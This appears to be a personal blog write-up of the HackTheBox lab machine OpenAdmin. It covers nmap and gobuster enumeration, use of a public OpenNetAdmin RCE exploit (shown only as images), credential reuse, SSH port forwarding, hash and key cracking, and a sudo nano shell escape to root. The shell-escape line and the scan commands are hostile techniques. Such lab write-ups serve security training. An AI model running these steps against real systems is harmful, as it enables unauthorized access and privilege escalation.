rootđź’€muzec-sec:~#

Hack. Sleep. Repeat

View on GitHub

image

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Wed Jul 14 08:01:37 2021 as: nmap -sC -sV -oA nmap 10.10.10.171
Nmap scan report for 10.10.10.171
Host is up (0.40s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 14 08:02:55 2021 -- 1 IP address (1 host up) scanned in 78.33 seconds

Linux my food lol so we are working on OpenAdmin On HackTheBox we always kick off with Nmap scan now that we have our result let start enumerating seems we have 2 open ports.

image

Ok that a default apache page now let hit gobuster to find some hidden directory.

                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.171]
└─$ gobuster dir -u http://10.10.10.171 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.171
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              bak,sh,pl,cgi,zip,txt,php,html
[+] Timeout:                 10s
===============================================================
2021/07/14 10:24:24 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10918]
/music                (Status: 301) [Size: 312] [--> http://10.10.10.171/music/]

Music directory cool let navigate to it.

image

Going through the pages clicking on login land me on a new page.

image

Seems it running OpenNetAdmin v18.1.1 let do a quick google search maybe it vulnerable.

image

image

Remote Code Execution exploit let try it.

image

We have shell cool.

image

Some users on the home directory but have no permission seems we need to move our privilege. Going through directories /var/www/ona/local/config i was able to get a credentials in a config file.

image

Now let SSH with user jimmy with the password.

image

We are in i always love checking what ports we have ruuning locally with netstat -tulpn .

image

SSH Port Forwarding

 ssh -L 52846:localhost:52846 jimmy@10.10.10.171

image

Now let access it on our browser.

image

Seems we need a credentials i try using Jimmy creds but no luck now back to enumerate more.

image

Username and a hash let try cracking it using online tools.

image

Now let log in.

image

Boom we have joanna SSH private key. Let crack it and hit SSH.

image

Now let SSH into the machine with the Private Key and the password we got from it.

image

We are in and can run sudo on /bin/nano /opt/priv .

ROOT

sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

image

We are root and Done.

Greeting From Muzec



Back To Home